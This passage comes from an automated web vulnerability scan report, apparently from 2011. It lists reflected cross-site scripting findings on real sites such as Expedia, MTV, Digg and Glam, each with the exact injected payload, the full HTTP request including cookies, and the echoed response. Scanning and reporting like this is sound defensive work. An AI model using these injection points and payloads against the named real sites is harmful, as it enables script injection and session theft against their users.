document.write('<img width="0" height="0" src="http://tag.admeld.com/match?admeld_adprovider_id=338fcef9'-alert(1)-'d33fbcbd51c&external_user_id=E3F32BD05A8DDF4D5646D79602A10F8B"/>');

4.246. http://um.simpli.fi/am_redirect_js [admeld_callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://um.simpli.fi
Path:	/am_redirect_js

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a1a2c'-alert(1)-'46b8e7c634 was submitted in the admeld_callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /am_redirect_js?admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=338&admeld_call_type=js&admeld_callback=http://tag.admeld.com/matcha1a2c'-alert(1)-'46b8e7c634 HTTP/1.1
Host: um.simpli.fi
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/z-the-fort-worth-four/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=0Cvz403fjVqW10ZWiw+hAg==

Response (redirected)

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 13 Jun 2011 11:21:43 GMT
Content-Type: application/x-javascript
Connection: close
Content-Length: 184

document.write('<img width="0" height="0" src="http://tag.admeld.com/matcha1a2c'-alert(1)-'46b8e7c634?admeld_adprovider_id=338&external_user_id=E3F32BD05A8DDF4D5646D79602A10F8B"/>');

4.247. http://widgets.digg.com/buttons/count [url parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://widgets.digg.com
Path:	/buttons/count

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 1b090<script>alert(1)</script>e766e5e5cfb was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /buttons/count?url=http%3A//www.ugo.com/tv/game-of-thrones-baelor-preview1b090<script>alert(1)</script>e766e5e5cfb HTTP/1.1
Host: widgets.digg.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/tv/game-of-thrones-baelor-preview
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Age: 0
Date: Mon, 13 Jun 2011 11:23:33 GMT
Via: NS-CACHE: 100
Etag: "7a3c1a3dcbd32c11d0e5d8f15c52d45412efe5b5"
Content-Length: 137
Server: TornadoServer/0.1
Content-Type: application/json
Accept-Ranges: bytes
Cache-Control: private, max-age=599
Expires: Mon, 13 Jun 2011 11:33:32 GMT
X-CDN: Cotendo
Connection: Keep-Alive

__DBW.collectDiggs({"url": "http://www.ugo.com/tv/game-of-thrones-baelor-preview1b090<script>alert(1)</script>e766e5e5cfb", "diggs": 0});

4.248. http://www.expedia.com/daily/prod/xmlgrid/psf/HotelAndPkgStandard.aspx [host parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.expedia.com
Path:	/daily/prod/xmlgrid/psf/HotelAndPkgStandard.aspx

Issue detail

The value of the host request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6604'%3balert(1)//7ea722c2105 was submitted in the host parameter. This input was echoed as a6604';alert(1)//7ea722c2105 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /daily/prod/xmlgrid/psf/HotelAndPkgStandard.aspx?&lob=hotels&region=7923&sort=&filter=&dest=New%20York%20City%20(Manhattan),%20NY&ps=25&host=www.expedia.coma6604'%3balert(1)//7ea722c2105 HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/daily/promos/deals/summervacationsale/destination_deals.asp?tab=0&dest=New%20York%20City%20(Manhattan),%20NY&mcicid=ssdestdeal2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=F398C033545B4D3D89FE3B1CF839F8D4; lsrc=v.1,06/16/2011; p1=`tpid=v.1,1`airp=v.1,WAS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`76; U9Z5=3GliPSECvgQGEk9h7y_oiNSot20RvvabDr74at3hDoHKA0LNmA2sm1A; s_vi=[CS]v1|26F3F40305011174-40000111E015E55F[CE]; SSLB=1; SSID1=AwC9VSkAAAAA5ufnTf9NBgHm5-dNAgB_8vVNAAAAAAAAAAB_8vVNAQAzAAAAWgcAAAI; SSSC1=1.G5613710435586297343.2.51.1882; SSRT1=f_L1TQE; ipsnf3=v.3|US|1|511|washington; COOKIECHECK=1; aspp=v.1,0|ssdestdeal2|||||||||MCI|20110713|; aspp=v.1,0|ssdestdeal2|||||||||MCI|20110713|; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; bn_u=5368708931696218534

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
X-AspNet-Version: 2.0.50727
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Content-Type: text/html; charset=utf-8
ntCoent-Length: 101095
Expires: Sat, 11 Dec 2010 18:02:13 GMT
Pragma: no-cache
RTSS: 1
Date: Mon, 13 Jun 2011 11:28:47 GMT
Content-Length: 101095
Connection: close
Vary: Accept-Encoding
Set-Cookie: SSRT1=bvT1TQE; path=/; domain=.expedia.com; expires=Tue, 12-Jun-2012 11:28:46 GMT

<html xmlns="http://www.w3.org/1999/xhtml">

<script type="text/javascript" language="Javascript">
function sendData()
{
   try
   {
       var f = (navigator.userAgent.indexOf("Firefox") > 0) ? 4
...[SNIP]...
value;
       var p2 = document.getElementById('ctl00_MainContent_hdnPrice2').value;
       var loc = getLocation();

       var id = 'proxyframe';
       var proxy = frames[id];
       var host = 'http://www.expedia.coma6604';alert(1)//7ea722c2105';
       host = (host == 'http://') ? 'http://www.expedia.com' : host;
       var url = host + '/daily/common/xmlgrid_proxy.html?height=' + h + '&price1=' + p1 + '&price2=' + p2 + '&location=' + loc;
       if(pr
...[SNIP]...

4.249. http://www.expedia.com/daily/prod/xmlgrid/psf/HotelAndPkgStandard.aspx [host parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.expedia.com
Path:	/daily/prod/xmlgrid/psf/HotelAndPkgStandard.aspx

Issue detail

The value of the host request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f98cb"style%3d"x%3aexpression(alert(1))"c39c924f1aa was submitted in the host parameter. This input was echoed as f98cb"style="x:expression(alert(1))"c39c924f1aa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /daily/prod/xmlgrid/psf/HotelAndPkgStandard.aspx?&lob=hotels&region=7923&sort=&filter=&dest=New%20York%20City%20(Manhattan),%20NY&ps=25&host=www.expedia.comf98cb"style%3d"x%3aexpression(alert(1))"c39c924f1aa HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/daily/promos/deals/summervacationsale/destination_deals.asp?tab=0&dest=New%20York%20City%20(Manhattan),%20NY&mcicid=ssdestdeal2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=F398C033545B4D3D89FE3B1CF839F8D4; lsrc=v.1,06/16/2011; p1=`tpid=v.1,1`airp=v.1,WAS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`76; U9Z5=3GliPSECvgQGEk9h7y_oiNSot20RvvabDr74at3hDoHKA0LNmA2sm1A; s_vi=[CS]v1|26F3F40305011174-40000111E015E55F[CE]; SSLB=1; SSID1=AwC9VSkAAAAA5ufnTf9NBgHm5-dNAgB_8vVNAAAAAAAAAAB_8vVNAQAzAAAAWgcAAAI; SSSC1=1.G5613710435586297343.2.51.1882; SSRT1=f_L1TQE; ipsnf3=v.3|US|1|511|washington; COOKIECHECK=1; aspp=v.1,0|ssdestdeal2|||||||||MCI|20110713|; aspp=v.1,0|ssdestdeal2|||||||||MCI|20110713|; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; bn_u=5368708931696218534

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
X-AspNet-Version: 2.0.50727
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Content-Type: text/html; charset=utf-8
ntCoent-Length: 101669
Expires: Sat, 11 Dec 2010 18:02:39 GMT
Pragma: no-cache
RTSS: 1
Date: Mon, 13 Jun 2011 11:28:44 GMT
Content-Length: 101669
Connection: close
Vary: Accept-Encoding
Set-Cookie: SSRT1=bPT1TQE; path=/; domain=.expedia.com; expires=Tue, 12-Jun-2012 11:28:44 GMT

<html xmlns="http://www.w3.org/1999/xhtml">

<script type="text/javascript" language="Javascript">
function sendData()
{
   try
   {
       var f = (navigator.userAgent.indexOf("Firefox") > 0) ? 4
...[SNIP]...
<a href="http://www.expedia.comf98cb"style="x:expression(alert(1))"c39c924f1aa/hotel.h892034.Hotel-Information?chkin=7/14/2011&chkout=7/18/2011&rm1=a2&hashTag=default&mcicid=112321680" target="_top">
...[SNIP]...

4.250. http://www.lijit.com/delivery/fp [n parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lijit.com
Path:	/delivery/fp

Issue detail

The value of the n request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b236"%3balert(1)//540f653fccb was submitted in the n parameter. This input was echoed as 6b236";alert(1)//540f653fccb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /delivery/fp?u=sbnation&z=114244&n=16b236"%3balert(1)//540f653fccb HTTP/1.1
Host: www.lijit.com
Proxy-Connection: keep-alive
Referer: http://www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljt_reader=hICMzwpkPEwAACnGFdIAAAAE; ljt_ts=t=1305981518646479; ljt_csync=dotomi%2Crtb_turn%2C1; ljtrtb=eJyrVjJUslIyMTYytbA0N7KwtDA2M7EwtDA2UKoFAFDjBd4%3D

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:02:39 GMT
Server: PWS/1.7.2.3
X-Px: ms iad-agg-n13 ( iad-agg-n12), ms iad-agg-n12 ( origin>CONN)
Cache-Control: max-age=7200
Expires: Mon, 13 Jun 2011 13:02:39 GMT
Age: 0
Content-Length: 15353
Content-Type: text/javascript
Vary: Accept-Encoding
Connection: keep-alive

function LjtAds_ReportError(errorMsg, except){
   try{
       errorMsg = "[Ads JS] "+ errorMsg
       try{
           errorMsg += " - "+ except.message
       } catch(e){}
       errorMsg = encodeURIComponent(errorMsg);

       var s
...[SNIP]...

   _ljt_zoneid = zone;
   return _ljt_zoneid;
}

try{
   // Settings: Change these values on a per user basis
   var lwp_ad_username = "sbnation";
   var lwp_ad_zoneid = ljt_getZoneID();
   var lwp_ad_numads = "16b236";alert(1)//540f653fccb";
   var lwp_ad_premium = "1";// or 0 for non-premium ad
   var lwp_ad_eleid = "lijit_region_114244";
   var lwp_method = "regex";
   var lwp_referring_search = getReferringSearch(document.referrer);

   var l
...[SNIP]...

4.251. http://www.mtv.com/global/music/scripts/reportFluxView.jhtml [uri parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.mtv.com
Path:	/global/music/scripts/reportFluxView.jhtml

Issue detail

The value of the uri request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b5cdb'%3balert(1)//4f44dae9baa was submitted in the uri parameter. This input was echoed as b5cdb';alert(1)//4f44dae9baa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /global/music/scripts/reportFluxView.jhtml?uri=http://moviesblog.mtv.com/2011/06/12/game-of-thrones-spoiler-death-sean-bean/b5cdb'%3balert(1)//4f44dae9baa HTTP/1.1
Host: www.mtv.com
Proxy-Connection: keep-alive
Referer: http://moviesblog.mtv.com/2011/06/12/game-of-thrones-spoiler-death-sean-bean/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1307963945|session#1307963884869-321358#1307965745

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
ETag: 81e676c1cc38885a3f194c8ab175c4
Last-Modified: Mon, 13 Jun 2011 11:22:47 GMT
Content-Type: application/x-javascript
Content-Length: 738
Cache-Control: max-age=86400
Date: Mon, 13 Jun 2011 11:22:47 GMT
Connection: close
Vary: Accept-Encoding

var reportUri = "http://moviesblog.mtv.com/2011/06/12/game-of-thrones-spoiler-death-sean-bean/b5cdb';alert(1)//4f44dae9baa";

if (reportUri.indexOf("photolist") != -1) {
reportUri = reportUri.substrin
...[SNIP]...
ndexOf(reportUri) == -1)
MTVN.Reporting.reportFluxView('http://t.flux.com/tracking.gif?CMU=D3FCFFFF0002D51D0002FFFFFCD3&CUR=http://moviesblog.mtv.com/2011/06/12/game-of-thrones-spoiler-death-sean-bean/b5cdb';alert(1)//4f44dae9baa&WN=ContentView');
}
else
MTVN.Reporting.reportFluxView('http://t.flux.com/tracking.gif?CMU=D3FCFFFF0002D51D0002FFFFFCD3&CUR=http://moviesblog.mtv.com/2011/06/12/game-of-thrones-spoiler-death-sean-bean
...[SNIP]...

4.252. http://www.mtv.com/global/music/scripts/reportFluxView.jhtml [uri parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.mtv.com
Path:	/global/music/scripts/reportFluxView.jhtml

Issue detail

The value of the uri request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dce15"%3balert(1)//f031f8e4633 was submitted in the uri parameter. This input was echoed as dce15";alert(1)//f031f8e4633 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /global/music/scripts/reportFluxView.jhtml?uri=http://moviesblog.mtv.com/2011/06/12/game-of-thrones-spoiler-death-sean-bean/dce15"%3balert(1)//f031f8e4633 HTTP/1.1
Host: www.mtv.com
Proxy-Connection: keep-alive
Referer: http://moviesblog.mtv.com/2011/06/12/game-of-thrones-spoiler-death-sean-bean/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1307963945|session#1307963884869-321358#1307965745

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
ETag: 467e08b16b111f0e72219eb7f368aef
Last-Modified: Mon, 13 Jun 2011 11:22:47 GMT
Content-Type: application/x-javascript
Content-Length: 738
Cache-Control: max-age=86311
Date: Mon, 13 Jun 2011 11:22:47 GMT
Connection: close
Vary: Accept-Encoding

var reportUri = "http://moviesblog.mtv.com/2011/06/12/game-of-thrones-spoiler-death-sean-bean/dce15";alert(1)//f031f8e4633";

if (reportUri.indexOf("photolist") != -1) {
reportUri = reportUri.substring(reportUri.lastIndexOf(":") + 1);

if (document.referrer.indexOf(reportUri) == -1)
MTVN.Reporting.reportFluxView('http://t
...[SNIP]...

4.253. http://www.paperg.com/jsfb/embed.php [bid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.paperg.com
Path:	/jsfb/embed.php

Issue detail

The value of the bid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 98743%3balert(1)//c7d5874a27e was submitted in the bid parameter. This input was echoed as 98743;alert(1)//c7d5874a27e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /jsfb/embed.php?pid=16509&bid=395898743%3balert(1)//c7d5874a27e HTTP/1.1
Host: www.paperg.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=27786045.1704528150.1305557138.1305557138.1305557138.1; __utmz=27786045.1305557138.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmz=1.1305557272.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1027440590.1305557272.1305557272.1305557272.1

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:02:27 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
P3P: CP="CAO PSA OUR"
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 45319
Connection: Keep-alive
Via: 1.1 AN-0016020122637050

var IMAGE_ROOT = 'http://www.paperg.com/beta/';
var flyerboard_root = 'http://www.paperg.com/jsfb/';
var remote_ip = '173.193.214.243';
var view = '';
var edit = '0';
var EMBED_URL395898743;alert(1)//c7d5874a27e = 'http://www.paperg.com/jsfb/embed.php?pid=16509&bid=395898743%3balert(1)//c7d5874a27e';
// links stylesheets in head
function pg_linkss(filename)
{
var head = document.getElementsByTagName('head'
...[SNIP]...

4.254. http://www.tvfanatic.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.tvfanatic.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a1b0"><script>alert(1)</script>15dca0967be was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /favicon.ico7a1b0"><script>alert(1)</script>15dca0967be HTTP/1.1
Host: www.tvfanatic.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fullsite=true; mut=173.193.214.243.1307963877795052; gn_country=US; __qca=P0-759770101-1307963912203; __utmz=258392143.1307963912.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=258392143.1701260498.1307963905.1307963905.1307963905.1; __utmc=258392143; __utmb=258392143.1.10.1307963905; __utmz=1.1307963915.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.209281195.1307963915.1307963915.1307963915.1; __utmc=1; __utmb=1.1.10.1307963915

Response (redirected)

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:25:41 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: fullsite=true; path=/; domain=.tvfanatic.com; expires=Mon, 13-Jun-2011 12:25:41 GMT
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=119vd5fdbfrvlcdvqdrjrk7jb7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent,Accept-Encoding
Content-Length: 28008
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<link rel="canonical" href="http://www.tvfanatic.com/favicon.ico7a1b0"><script>alert(1)</script>15dca0967be/" />
...[SNIP]...

4.255. http://www2.glam.com/app/site/affiliate/viewChannelModule.act [adSize parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www2.glam.com
Path:	/app/site/affiliate/viewChannelModule.act

Issue detail

The value of the adSize request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 904da'%3balert(1)//a6df15db7aa was submitted in the adSize parameter. This input was echoed as 904da';alert(1)//a6df15db7aa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /app/site/affiliate/viewChannelModule.act?mName=viewAdJs&affiliateId=1000212071&adSize=300x250904da'%3balert(1)//a6df15db7aa HTTP/1.1
Host: www2.glam.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: glam_sid=115232130551023312111; ctags=%3bct%3dpacsun%3bct%3dxboxk3905

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Type: application/x-javascript
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Cache-Control: max-age=450
Date: Mon, 13 Jun 2011 11:02:08 GMT
Content-Length: 60046
Connection: close

// 
// 

window.glam_session = new Object();
window.glam_session.countr
...[SNIP]...
segs&gvalue=!qcsegs" height="0" width="0" border="0">');

function GlamProcessScriptParams()
{

}

window.glam_affiliate_id = '1000212071';
window.glam_zone = '';
window.glam_ad_size = '300x250904da';alert(1)//a6df15db7aa';
window.glam_status = '';
window.glam_status = (window.glam_status==''?null:window.glam_status);

/*
*/

function GlamShowCustomDefaultAd(zone, adSize) {}
window.glam_affiliate_info = new Array();
...[SNIP]...

4.256. http://www24a.glam.com/appdir/getscript.jsp [view parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www24a.glam.com
Path:	/appdir/getscript.jsp

Issue detail

The value of the view request parameter is copied into the HTML document as plain text between tags. The payload d7e21<script>alert(1)</script>dff1cb4ef11 was submitted in the view parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /appdir/getscript.jsp?view=profiled7e21<script>alert(1)</script>dff1cb4ef11&aid=104510405&render=1&ak=1&iid=33896 HTTP/1.1
Host: www24a.glam.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: glam_sid=115232130551023312111; ctags=%3bct%3dpacsun%3bct%3dxboxk3905; bkpix2=1

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=ISO-8859-1
Server: Jetty(6.1.21)
Vary: Accept-Encoding
Date: Mon, 13 Jun 2011 11:02:19 GMT
Content-Length: 67410
Connection: close

window.glamMetricsData = 'pubId=' + encodeURIComponent(window.glam_affiliate_id ? window.glam_affiliate_id : '104510405')
+ '&pv=' + encodeURIComponent(window.atakoOrd ? window.atakoOrd : (window
...[SNIP]...
.gsUrl = "http://www24a.glam.com/appdir";
gadget.mid = "73410477362939";
gadget.isConfig = "";
gadget.developerId = 363645764;
gadget.publisherId = 104510405;
gadget.view = "profiled7e21<script>alert(1)</script>dff1cb4ef11";
gadget.hashData = glamMetricsData; // XXX not safe

gadget.hasInline = '1';
gadget.inlineContent = '<script type=\'text/javascript\' >
...[SNIP]...

4.257. http://www35.glam.com/gad/glamadapt_jsrv.act [;flg parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www35.glam.com
Path:	/gad/glamadapt_jsrv.act

Issue detail

The value of the ;flg request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d81b8'%3balert(1)//95ae78e6706 was submitted in the ;flg parameter. This input was echoed as d81b8';alert(1)//95ae78e6706 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /gad/glamadapt_jsrv.act?;flg=64;;zone=/;nt=b;cc=us;aft=p;ec=ron;p=0;p=1;!c=nae;!c=s;!c=sf;al=walmartdv;ec=tsp;ia=mf;jpbrash=admax;pec=sp;psh=y;rmt=exp;vec=sp;vpec=sp;ct=pacsun;ct=xboxk3905;atf=0;pfl=3;dt=s;!c=hagl;!c=hagn;pt=0;afid=1000212071;dsid=864279;pt=sk;gsz=888x11:999,300x250:1;uv=10;;tt=j;u=b0021fawbst1ssbzd4i,f0f02sa,g10001s;sz=300x250;tile=1;ord=4876240110024810;;afid=1000212071;dsid=864279;url=txanco;seq=1;ux=f-f02sa,tid-1,pid-fawbst1ssbzd4i,aid-2,g-64,1,;_glt=300:1:6:2:1:979:2011:6:13;a_tz=-300;_g_cv=2;d81b8'%3balert(1)//95ae78e6706 HTTP/1.1
Host: www35.glam.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: glam_sid=115232130551023312111; ctags=%3bct%3dpacsun%3bct%3dxboxk3905; bkpix2=1

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: application/x-javascript
ETag: "d398cadfb255eaeb5658516ed12d9db3:1307759730"
X-Glam-Bdata: XGlamBData,nbt,ls,rs
X-Glam-AdId: 5000045035
X-Glam-Euid: fd547b017683849502d2229b81cac510
X-Powered-By: GlamAdapt/ASE/1.5
Vary: Accept-Encoding
Expires: Mon, 13 Jun 2011 11:02:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 13 Jun 2011 11:02:10 GMT
Content-Length: 3261
Connection: close

...[SNIP]...
,f0f02sa,g10001s;sz=300x250;tile=1;ord=4876240110024810;;afid=1000212071;dsid=864279;url=txanco;seq=1;ux=f-f02sa,tid-1,pid-fawbst1ssbzd4i,aid-2,g-64,1,;_glt=300:1:6:2:1:979:2011:6:13;a_tz=-300;_g_cv=2;d81b8';alert(1)//95ae78e6706;';
var vars = glam_affiliate_vars.split(";");
for (var i=0;i<vars.length;i++) {
var pair = vars[i].split("=");
if ( pair[1] ) { glam_info[pair[0]] = pair[1]; }
}
return ( glam_info[pName
...[SNIP]...

4.258. http://www35.glam.com/gad/glamadapt_jsrv.act [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www35.glam.com
Path:	/gad/glamadapt_jsrv.act

Issue detail

